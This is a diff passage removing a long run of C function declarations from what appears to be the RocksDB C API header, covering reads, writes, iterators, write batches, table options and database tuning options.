-extern ROCKSDB_LIBRARY_API void rocksdb_merge(
-    rocksdb_t* db, const rocksdb_writeoptions_t* options, const char* key,
-    size_t keylen, const char* val, size_t vallen, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_merge_cf(
-    rocksdb_t* db, const rocksdb_writeoptions_t* options,
-    rocksdb_column_family_handle_t* column_family, const char* key,
-    size_t keylen, const char* val, size_t vallen, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_write(
-    rocksdb_t* db, const rocksdb_writeoptions_t* options,
-    rocksdb_writebatch_t* batch, char** errptr);
-
-/* Returns NULL if not found.  A malloc()ed array otherwise.
-   Stores the length of the array in *vallen. */
-extern ROCKSDB_LIBRARY_API char* rocksdb_get(
-    rocksdb_t* db, const rocksdb_readoptions_t* options, const char* key,
-    size_t keylen, size_t* vallen, char** errptr);
-
-extern ROCKSDB_LIBRARY_API char* rocksdb_get_cf(
-    rocksdb_t* db, const rocksdb_readoptions_t* options,
-    rocksdb_column_family_handle_t* column_family, const char* key,
-    size_t keylen, size_t* vallen, char** errptr);
-
-// if values_list[i] == NULL and errs[i] == NULL,
-// then we got status.IsNotFound(), which we will not return.
-// all errors except status status.ok() and status.IsNotFound() are returned.
-//
-// errs, values_list and values_list_sizes must be num_keys in length,
-// allocated by the caller.
-// errs is a list of strings as opposed to the conventional one error,
-// where errs[i] is the status for retrieval of keys_list[i].
-// each non-NULL errs entry is a malloc()ed, null terminated string.
-// each non-NULL values_list entry is a malloc()ed array, with
-// the length for each stored in values_list_sizes[i].
-extern ROCKSDB_LIBRARY_API void rocksdb_multi_get(
-    rocksdb_t* db, const rocksdb_readoptions_t* options, size_t num_keys,
-    const char* const* keys_list, const size_t* keys_list_sizes,
-    char** values_list, size_t* values_list_sizes, char** errs);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_multi_get_cf(
-    rocksdb_t* db, const rocksdb_readoptions_t* options,
-    const rocksdb_column_family_handle_t* const* column_families,
-    size_t num_keys, const char* const* keys_list,
-    const size_t* keys_list_sizes, char** values_list,
-    size_t* values_list_sizes, char** errs);
-
-extern ROCKSDB_LIBRARY_API rocksdb_iterator_t* rocksdb_create_iterator(
-    rocksdb_t* db, const rocksdb_readoptions_t* options);
-
-extern ROCKSDB_LIBRARY_API rocksdb_iterator_t* rocksdb_create_iterator_cf(
-    rocksdb_t* db, const rocksdb_readoptions_t* options,
-    rocksdb_column_family_handle_t* column_family);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_create_iterators(
-    rocksdb_t *db, rocksdb_readoptions_t* opts,
-    rocksdb_column_family_handle_t** column_families,
-    rocksdb_iterator_t** iterators, size_t size, char** errptr);
-
-extern ROCKSDB_LIBRARY_API const rocksdb_snapshot_t* rocksdb_create_snapshot(
-    rocksdb_t* db);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_release_snapshot(
-    rocksdb_t* db, const rocksdb_snapshot_t* snapshot);
-
-/* Returns NULL if property name is unknown.
-   Else returns a pointer to a malloc()-ed null-terminated value. */
-extern ROCKSDB_LIBRARY_API char* rocksdb_property_value(rocksdb_t* db,
-                                                        const char* propname);
-/* returns 0 on success, -1 otherwise */
-int rocksdb_property_int(
-    rocksdb_t* db,
-    const char* propname, uint64_t *out_val);
-
-extern ROCKSDB_LIBRARY_API char* rocksdb_property_value_cf(
-    rocksdb_t* db, rocksdb_column_family_handle_t* column_family,
-    const char* propname);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_approximate_sizes(
-    rocksdb_t* db, int num_ranges, const char* const* range_start_key,
-    const size_t* range_start_key_len, const char* const* range_limit_key,
-    const size_t* range_limit_key_len, uint64_t* sizes);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_approximate_sizes_cf(
-    rocksdb_t* db, rocksdb_column_family_handle_t* column_family,
-    int num_ranges, const char* const* range_start_key,
-    const size_t* range_start_key_len, const char* const* range_limit_key,
-    const size_t* range_limit_key_len, uint64_t* sizes);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_compact_range(rocksdb_t* db,
-                                                      const char* start_key,
-                                                      size_t start_key_len,
-                                                      const char* limit_key,
-                                                      size_t limit_key_len);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_compact_range_cf(
-    rocksdb_t* db, rocksdb_column_family_handle_t* column_family,
-    const char* start_key, size_t start_key_len, const char* limit_key,
-    size_t limit_key_len);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_compact_range_opt(
-    rocksdb_t* db, rocksdb_compactoptions_t* opt, const char* start_key,
-    size_t start_key_len, const char* limit_key, size_t limit_key_len);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_compact_range_cf_opt(
-    rocksdb_t* db, rocksdb_column_family_handle_t* column_family,
-    rocksdb_compactoptions_t* opt, const char* start_key, size_t start_key_len,
-    const char* limit_key, size_t limit_key_len);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_delete_file(rocksdb_t* db,
-                                                    const char* name);
-
-extern ROCKSDB_LIBRARY_API const rocksdb_livefiles_t* rocksdb_livefiles(
-    rocksdb_t* db);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_flush(
-    rocksdb_t* db, const rocksdb_flushoptions_t* options, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_disable_file_deletions(rocksdb_t* db,
-                                                               char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_enable_file_deletions(
-    rocksdb_t* db, unsigned char force, char** errptr);
-
-/* Management operations */
-
-extern ROCKSDB_LIBRARY_API void rocksdb_destroy_db(
-    const rocksdb_options_t* options, const char* name, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_repair_db(
-    const rocksdb_options_t* options, const char* name, char** errptr);
-
-/* Iterator */
-
-extern ROCKSDB_LIBRARY_API void rocksdb_iter_destroy(rocksdb_iterator_t*);
-extern ROCKSDB_LIBRARY_API unsigned char rocksdb_iter_valid(
-    const rocksdb_iterator_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_iter_seek_to_first(rocksdb_iterator_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_iter_seek_to_last(rocksdb_iterator_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_iter_seek(rocksdb_iterator_t*,
-                                                  const char* k, size_t klen);
-extern ROCKSDB_LIBRARY_API void rocksdb_iter_seek_for_prev(rocksdb_iterator_t*,
-                                                           const char* k,
-                                                           size_t klen);
-extern ROCKSDB_LIBRARY_API void rocksdb_iter_next(rocksdb_iterator_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_iter_prev(rocksdb_iterator_t*);
-extern ROCKSDB_LIBRARY_API const char* rocksdb_iter_key(
-    const rocksdb_iterator_t*, size_t* klen);
-extern ROCKSDB_LIBRARY_API const char* rocksdb_iter_value(
-    const rocksdb_iterator_t*, size_t* vlen);
-extern ROCKSDB_LIBRARY_API void rocksdb_iter_get_error(
-    const rocksdb_iterator_t*, char** errptr);
-
-/* Write batch */
-
-extern ROCKSDB_LIBRARY_API rocksdb_writebatch_t* rocksdb_writebatch_create();
-extern ROCKSDB_LIBRARY_API rocksdb_writebatch_t* rocksdb_writebatch_create_from(
-    const char* rep, size_t size);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_destroy(
-    rocksdb_writebatch_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_clear(rocksdb_writebatch_t*);
-extern ROCKSDB_LIBRARY_API int rocksdb_writebatch_count(rocksdb_writebatch_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_put(rocksdb_writebatch_t*,
-                                                       const char* key,
-                                                       size_t klen,
-                                                       const char* val,
-                                                       size_t vlen);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_put_cf(
-    rocksdb_writebatch_t*, rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t klen, const char* val, size_t vlen);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_putv(
-    rocksdb_writebatch_t* b, int num_keys, const char* const* keys_list,
-    const size_t* keys_list_sizes, int num_values,
-    const char* const* values_list, const size_t* values_list_sizes);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_putv_cf(
-    rocksdb_writebatch_t* b, rocksdb_column_family_handle_t* column_family,
-    int num_keys, const char* const* keys_list, const size_t* keys_list_sizes,
-    int num_values, const char* const* values_list,
-    const size_t* values_list_sizes);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_merge(rocksdb_writebatch_t*,
-                                                         const char* key,
-                                                         size_t klen,
-                                                         const char* val,
-                                                         size_t vlen);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_merge_cf(
-    rocksdb_writebatch_t*, rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t klen, const char* val, size_t vlen);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_mergev(
-    rocksdb_writebatch_t* b, int num_keys, const char* const* keys_list,
-    const size_t* keys_list_sizes, int num_values,
-    const char* const* values_list, const size_t* values_list_sizes);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_mergev_cf(
-    rocksdb_writebatch_t* b, rocksdb_column_family_handle_t* column_family,
-    int num_keys, const char* const* keys_list, const size_t* keys_list_sizes,
-    int num_values, const char* const* values_list,
-    const size_t* values_list_sizes);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_delete(rocksdb_writebatch_t*,
-                                                          const char* key,
-                                                          size_t klen);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_delete_cf(
-    rocksdb_writebatch_t*, rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t klen);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_deletev(
-    rocksdb_writebatch_t* b, int num_keys, const char* const* keys_list,
-    const size_t* keys_list_sizes);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_deletev_cf(
-    rocksdb_writebatch_t* b, rocksdb_column_family_handle_t* column_family,
-    int num_keys, const char* const* keys_list, const size_t* keys_list_sizes);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_delete_range(
-    rocksdb_writebatch_t* b, const char* start_key, size_t start_key_len,
-    const char* end_key, size_t end_key_len);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_delete_range_cf(
-    rocksdb_writebatch_t* b, rocksdb_column_family_handle_t* column_family,
-    const char* start_key, size_t start_key_len, const char* end_key,
-    size_t end_key_len);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_delete_rangev(
-    rocksdb_writebatch_t* b, int num_keys, const char* const* start_keys_list,
-    const size_t* start_keys_list_sizes, const char* const* end_keys_list,
-    const size_t* end_keys_list_sizes);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_delete_rangev_cf(
-    rocksdb_writebatch_t* b, rocksdb_column_family_handle_t* column_family,
-    int num_keys, const char* const* start_keys_list,
-    const size_t* start_keys_list_sizes, const char* const* end_keys_list,
-    const size_t* end_keys_list_sizes);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_put_log_data(
-    rocksdb_writebatch_t*, const char* blob, size_t len);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_iterate(
-    rocksdb_writebatch_t*, void* state,
-    void (*put)(void*, const char* k, size_t klen, const char* v, size_t vlen),
-    void (*deleted)(void*, const char* k, size_t klen));
-extern ROCKSDB_LIBRARY_API const char* rocksdb_writebatch_data(
-    rocksdb_writebatch_t*, size_t* size);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_set_save_point(
-    rocksdb_writebatch_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_rollback_to_save_point(
-    rocksdb_writebatch_t*, char** errptr);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_pop_save_point(
-    rocksdb_writebatch_t*, char** errptr);
-
-/* Write batch with index */
-
-extern ROCKSDB_LIBRARY_API rocksdb_writebatch_wi_t* rocksdb_writebatch_wi_create(
-                                                       size_t reserved_bytes,
-                                                       unsigned char overwrite_keys);
-extern ROCKSDB_LIBRARY_API rocksdb_writebatch_wi_t* rocksdb_writebatch_wi_create_from(
-    const char* rep, size_t size);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_destroy(
-    rocksdb_writebatch_wi_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_clear(rocksdb_writebatch_wi_t*);
-extern ROCKSDB_LIBRARY_API int rocksdb_writebatch_wi_count(rocksdb_writebatch_wi_t* b);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_put(rocksdb_writebatch_wi_t*,
-                                                       const char* key,
-                                                       size_t klen,
-                                                       const char* val,
-                                                       size_t vlen);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_put_cf(
-    rocksdb_writebatch_wi_t*, rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t klen, const char* val, size_t vlen);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_putv(
-    rocksdb_writebatch_wi_t* b, int num_keys, const char* const* keys_list,
-    const size_t* keys_list_sizes, int num_values,
-    const char* const* values_list, const size_t* values_list_sizes);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_putv_cf(
-    rocksdb_writebatch_wi_t* b, rocksdb_column_family_handle_t* column_family,
-    int num_keys, const char* const* keys_list, const size_t* keys_list_sizes,
-    int num_values, const char* const* values_list,
-    const size_t* values_list_sizes);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_merge(rocksdb_writebatch_wi_t*,
-                                                         const char* key,
-                                                         size_t klen,
-                                                         const char* val,
-                                                         size_t vlen);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_merge_cf(
-    rocksdb_writebatch_wi_t*, rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t klen, const char* val, size_t vlen);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_mergev(
-    rocksdb_writebatch_wi_t* b, int num_keys, const char* const* keys_list,
-    const size_t* keys_list_sizes, int num_values,
-    const char* const* values_list, const size_t* values_list_sizes);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_mergev_cf(
-    rocksdb_writebatch_wi_t* b, rocksdb_column_family_handle_t* column_family,
-    int num_keys, const char* const* keys_list, const size_t* keys_list_sizes,
-    int num_values, const char* const* values_list,
-    const size_t* values_list_sizes);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_delete(rocksdb_writebatch_wi_t*,
-                                                          const char* key,
-                                                          size_t klen);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_delete_cf(
-    rocksdb_writebatch_wi_t*, rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t klen);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_deletev(
-    rocksdb_writebatch_wi_t* b, int num_keys, const char* const* keys_list,
-    const size_t* keys_list_sizes);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_deletev_cf(
-    rocksdb_writebatch_wi_t* b, rocksdb_column_family_handle_t* column_family,
-    int num_keys, const char* const* keys_list, const size_t* keys_list_sizes);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_delete_range(
-    rocksdb_writebatch_wi_t* b, const char* start_key, size_t start_key_len,
-    const char* end_key, size_t end_key_len);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_delete_range_cf(
-    rocksdb_writebatch_wi_t* b, rocksdb_column_family_handle_t* column_family,
-    const char* start_key, size_t start_key_len, const char* end_key,
-    size_t end_key_len);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_delete_rangev(
-    rocksdb_writebatch_wi_t* b, int num_keys, const char* const* start_keys_list,
-    const size_t* start_keys_list_sizes, const char* const* end_keys_list,
-    const size_t* end_keys_list_sizes);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_delete_rangev_cf(
-    rocksdb_writebatch_wi_t* b, rocksdb_column_family_handle_t* column_family,
-    int num_keys, const char* const* start_keys_list,
-    const size_t* start_keys_list_sizes, const char* const* end_keys_list,
-    const size_t* end_keys_list_sizes);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_put_log_data(
-    rocksdb_writebatch_wi_t*, const char* blob, size_t len);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_iterate(
-    rocksdb_writebatch_wi_t* b,
-    void* state,
-    void (*put)(void*, const char* k, size_t klen, const char* v, size_t vlen),
-    void (*deleted)(void*, const char* k, size_t klen));
-extern ROCKSDB_LIBRARY_API const char* rocksdb_writebatch_wi_data(
-    rocksdb_writebatch_wi_t* b,
-    size_t* size);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_set_save_point(
-    rocksdb_writebatch_wi_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_writebatch_wi_rollback_to_save_point(
-    rocksdb_writebatch_wi_t*, char** errptr);
-extern ROCKSDB_LIBRARY_API char* rocksdb_writebatch_wi_get_from_batch(
-    rocksdb_writebatch_wi_t* wbwi,
-    const rocksdb_options_t* options,
-    const char* key, size_t keylen,
-    size_t* vallen,
-    char** errptr);
-extern ROCKSDB_LIBRARY_API char* rocksdb_writebatch_wi_get_from_batch_cf(
-    rocksdb_writebatch_wi_t* wbwi,
-    const rocksdb_options_t* options,
-    rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t keylen,
-    size_t* vallen,
-    char** errptr);
-extern ROCKSDB_LIBRARY_API char* rocksdb_writebatch_wi_get_from_batch_and_db(
-    rocksdb_writebatch_wi_t* wbwi,
-    rocksdb_t* db,
-    const rocksdb_readoptions_t* options,
-    const char* key, size_t keylen,
-    size_t* vallen,
-    char** errptr);
-extern ROCKSDB_LIBRARY_API char* rocksdb_writebatch_wi_get_from_batch_and_db_cf(
-    rocksdb_writebatch_wi_t* wbwi,
-    rocksdb_t* db,
-    const rocksdb_readoptions_t* options,
-    rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t keylen,
-    size_t* vallen,
-    char** errptr);
-extern ROCKSDB_LIBRARY_API void rocksdb_write_writebatch_wi(
-    rocksdb_t* db,
-    const rocksdb_writeoptions_t* options,
-    rocksdb_writebatch_wi_t* wbwi,
-    char** errptr);
-extern ROCKSDB_LIBRARY_API rocksdb_iterator_t* rocksdb_writebatch_wi_create_iterator_with_base(
-    rocksdb_writebatch_wi_t* wbwi,
-    rocksdb_iterator_t* base_iterator);
-extern ROCKSDB_LIBRARY_API rocksdb_iterator_t* rocksdb_writebatch_wi_create_iterator_with_base_cf(
-    rocksdb_writebatch_wi_t* wbwi,
-    rocksdb_iterator_t* base_iterator,
-    rocksdb_column_family_handle_t* cf);
-
-
-/* Block based table options */
-
-extern ROCKSDB_LIBRARY_API rocksdb_block_based_table_options_t*
-rocksdb_block_based_options_create();
-extern ROCKSDB_LIBRARY_API void rocksdb_block_based_options_destroy(
-    rocksdb_block_based_table_options_t* options);
-extern ROCKSDB_LIBRARY_API void rocksdb_block_based_options_set_block_size(
-    rocksdb_block_based_table_options_t* options, size_t block_size);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_block_based_options_set_block_size_deviation(
-    rocksdb_block_based_table_options_t* options, int block_size_deviation);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_block_based_options_set_block_restart_interval(
-    rocksdb_block_based_table_options_t* options, int block_restart_interval);
-extern ROCKSDB_LIBRARY_API void rocksdb_block_based_options_set_filter_policy(
-    rocksdb_block_based_table_options_t* options,
-    rocksdb_filterpolicy_t* filter_policy);
-extern ROCKSDB_LIBRARY_API void rocksdb_block_based_options_set_no_block_cache(
-    rocksdb_block_based_table_options_t* options, unsigned char no_block_cache);
-extern ROCKSDB_LIBRARY_API void rocksdb_block_based_options_set_block_cache(
-    rocksdb_block_based_table_options_t* options, rocksdb_cache_t* block_cache);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_block_based_options_set_block_cache_compressed(
-    rocksdb_block_based_table_options_t* options,
-    rocksdb_cache_t* block_cache_compressed);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_block_based_options_set_whole_key_filtering(
-    rocksdb_block_based_table_options_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void rocksdb_block_based_options_set_format_version(
-    rocksdb_block_based_table_options_t*, int);
-enum {
-  rocksdb_block_based_table_index_type_binary_search = 0,
-  rocksdb_block_based_table_index_type_hash_search = 1,
-  rocksdb_block_based_table_index_type_two_level_index_search = 2,
-};
-extern ROCKSDB_LIBRARY_API void rocksdb_block_based_options_set_index_type(
-    rocksdb_block_based_table_options_t*, int);  // uses one of the above enums
-extern ROCKSDB_LIBRARY_API void
-rocksdb_block_based_options_set_hash_index_allow_collision(
-    rocksdb_block_based_table_options_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_block_based_options_set_cache_index_and_filter_blocks(
-    rocksdb_block_based_table_options_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_block_based_options_set_pin_l0_filter_and_index_blocks_in_cache(
-    rocksdb_block_based_table_options_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_block_based_table_factory(
-    rocksdb_options_t* opt, rocksdb_block_based_table_options_t* table_options);
-
-/* Cuckoo table options */
-
-extern ROCKSDB_LIBRARY_API rocksdb_cuckoo_table_options_t*
-rocksdb_cuckoo_options_create();
-extern ROCKSDB_LIBRARY_API void rocksdb_cuckoo_options_destroy(
-    rocksdb_cuckoo_table_options_t* options);
-extern ROCKSDB_LIBRARY_API void rocksdb_cuckoo_options_set_hash_ratio(
-    rocksdb_cuckoo_table_options_t* options, double v);
-extern ROCKSDB_LIBRARY_API void rocksdb_cuckoo_options_set_max_search_depth(
-    rocksdb_cuckoo_table_options_t* options, uint32_t v);
-extern ROCKSDB_LIBRARY_API void rocksdb_cuckoo_options_set_cuckoo_block_size(
-    rocksdb_cuckoo_table_options_t* options, uint32_t v);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_cuckoo_options_set_identity_as_first_hash(
-    rocksdb_cuckoo_table_options_t* options, unsigned char v);
-extern ROCKSDB_LIBRARY_API void rocksdb_cuckoo_options_set_use_module_hash(
-    rocksdb_cuckoo_table_options_t* options, unsigned char v);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_cuckoo_table_factory(
-    rocksdb_options_t* opt, rocksdb_cuckoo_table_options_t* table_options);
-
-/* Options */
-extern ROCKSDB_LIBRARY_API void rocksdb_set_options(
-    rocksdb_t* db, int count, const char* const keys[], const char* const values[], char** errptr);
-
-extern ROCKSDB_LIBRARY_API rocksdb_options_t* rocksdb_options_create();
-extern ROCKSDB_LIBRARY_API void rocksdb_options_destroy(rocksdb_options_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_increase_parallelism(
-    rocksdb_options_t* opt, int total_threads);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_optimize_for_point_lookup(
-    rocksdb_options_t* opt, uint64_t block_cache_size_mb);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_optimize_level_style_compaction(
-    rocksdb_options_t* opt, uint64_t memtable_memory_budget);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_options_optimize_universal_style_compaction(
-    rocksdb_options_t* opt, uint64_t memtable_memory_budget);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_compaction_filter(
-    rocksdb_options_t*, rocksdb_compactionfilter_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_compaction_filter_factory(
-    rocksdb_options_t*, rocksdb_compactionfilterfactory_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_compaction_readahead_size(
-    rocksdb_options_t*, size_t);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_comparator(
-    rocksdb_options_t*, rocksdb_comparator_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_merge_operator(
-    rocksdb_options_t*, rocksdb_mergeoperator_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_uint64add_merge_operator(
-    rocksdb_options_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_compression_per_level(
-    rocksdb_options_t* opt, int* level_values, size_t num_levels);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_create_if_missing(
-    rocksdb_options_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_options_set_create_missing_column_families(rocksdb_options_t*,
-                                                   unsigned char);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_error_if_exists(
-    rocksdb_options_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_paranoid_checks(
-    rocksdb_options_t*, unsigned char);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_db_paths(rocksdb_options_t*,
-                                                             const rocksdb_dbpath_t** path_values, 
-                                                             size_t num_paths);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_env(rocksdb_options_t*,
-                                                        rocksdb_env_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_info_log(rocksdb_options_t*,
-                                                             rocksdb_logger_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_info_log_level(
-    rocksdb_options_t*, int);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_write_buffer_size(
-    rocksdb_options_t*, size_t);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_db_write_buffer_size(
-    rocksdb_options_t*, size_t);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_max_open_files(
-    rocksdb_options_t*, int);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_max_file_opening_threads(
-    rocksdb_options_t*, int);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_max_total_wal_size(
-    rocksdb_options_t* opt, uint64_t n);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_compression_options(
-    rocksdb_options_t*, int, int, int, int);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_prefix_extractor(
-    rocksdb_options_t*, rocksdb_slicetransform_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_num_levels(
-    rocksdb_options_t*, int);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_options_set_level0_file_num_compaction_trigger(rocksdb_options_t*, int);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_options_set_level0_slowdown_writes_trigger(rocksdb_options_t*, int);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_level0_stop_writes_trigger(
-    rocksdb_options_t*, int);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_max_mem_compaction_level(
-    rocksdb_options_t*, int);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_target_file_size_base(
-    rocksdb_options_t*, uint64_t);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_target_file_size_multiplier(
-    rocksdb_options_t*, int);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_max_bytes_for_level_base(
-    rocksdb_options_t*, uint64_t);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_options_set_level_compaction_dynamic_level_bytes(rocksdb_options_t*,
-                                                         unsigned char);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_options_set_max_bytes_for_level_multiplier(rocksdb_options_t*, double);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_options_set_max_bytes_for_level_multiplier_additional(
-    rocksdb_options_t*, int* level_values, size_t num_levels);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_enable_statistics(
-    rocksdb_options_t*);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_skip_stats_update_on_db_open(
-    rocksdb_options_t* opt, unsigned char val);
-
-/* returns a pointer to a malloc()-ed, null terminated string */
-extern ROCKSDB_LIBRARY_API char* rocksdb_options_statistics_get_string(
-    rocksdb_options_t* opt);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_max_write_buffer_number(
-    rocksdb_options_t*, int);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_options_set_min_write_buffer_number_to_merge(rocksdb_options_t*, int);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_options_set_max_write_buffer_number_to_maintain(rocksdb_options_t*,
-                                                        int);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_max_background_compactions(
-    rocksdb_options_t*, int);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_base_background_compactions(
-    rocksdb_options_t*, int);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_max_background_flushes(
-    rocksdb_options_t*, int);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_max_log_file_size(
-    rocksdb_options_t*, size_t);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_log_file_time_to_roll(
-    rocksdb_options_t*, size_t);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_keep_log_file_num(
-    rocksdb_options_t*, size_t);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_recycle_log_file_num(
-    rocksdb_options_t*, size_t);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_soft_rate_limit(
-    rocksdb_options_t*, double);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_hard_rate_limit(
-    rocksdb_options_t*, double);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_soft_pending_compaction_bytes_limit(
-    rocksdb_options_t* opt, size_t v);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_hard_pending_compaction_bytes_limit(
-    rocksdb_options_t* opt, size_t v);
-extern ROCKSDB_LIBRARY_API void
-rocksdb_options_set_rate_limit_delay_max_milliseconds(rocksdb_options_t*,
-                                                      unsigned int);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_max_manifest_file_size(
-    rocksdb_options_t*, size_t);
-extern ROCKSDB_LIBRARY_API void rocksdb_options_set_table_cache_numshardbits(
-    rocksdb_options_t*, int);
